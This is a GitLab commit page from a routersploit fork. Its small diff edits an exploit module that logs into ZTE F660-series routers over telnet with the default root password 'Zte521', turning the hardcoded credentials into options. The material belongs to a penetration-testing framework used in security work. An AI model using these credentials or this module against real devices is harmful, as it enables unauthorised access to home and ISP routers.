Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
5d98e2bf
Commit
5d98e2bf
authored
May 03, 2016
by
devilscream
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Fix exploits ZTE F6XX default root password
parent
e3ff667c
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
6 additions
and
7 deletions
+6
-7
f6xx_default_root.py
routersploit/modules/exploits/zte/f6xx_default_root.py
+6
-7
No files found.
routersploit/modules/exploits/zte/f6xx_default_root.py
View file @
5d98e2bf
...
...
@@ -14,13 +14,12 @@ class Exploit(exploits.Exploit):
"""
__info__
=
{
'name'
:
'ZTE F6XX Default root'
,
'description'
:
'Module exploits ZTE F6XX default root password. If the target is
is
possible to authentiate to the device.'
,
'description'
:
'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.'
,
'authors'
:
[
'devilscream'
,
# vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
'devilscream'
# vulnerability discovery
],
'references'
:
[
'
'
,
'
http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
],
'devices'
:
[
'ZTE ZXA10 F660'
,
...
...
@@ -30,9 +29,8 @@ class Exploit(exploits.Exploit):
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. 192.168.1.1'
)
# target address
username
=
"root"
password
=
"Zte521"
username
=
exploits
.
Option
(
"root"
,
"Username to authenticate with"
)
# telnet username, default root
password
=
exploits
.
Option
(
"Zte521"
,
"Password to authenticate with"
)
# telnet password, default Zte521
def
run
(
self
):
try
:
...
...
@@ -58,6 +56,7 @@ class Exploit(exploits.Exploit):
print_error
(
"Connection Error"
)
return
@mute
def
check
(
self
):
try
:
tn
=
telnetlib
.
Telnet
(
self
.
target
,
23
)
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment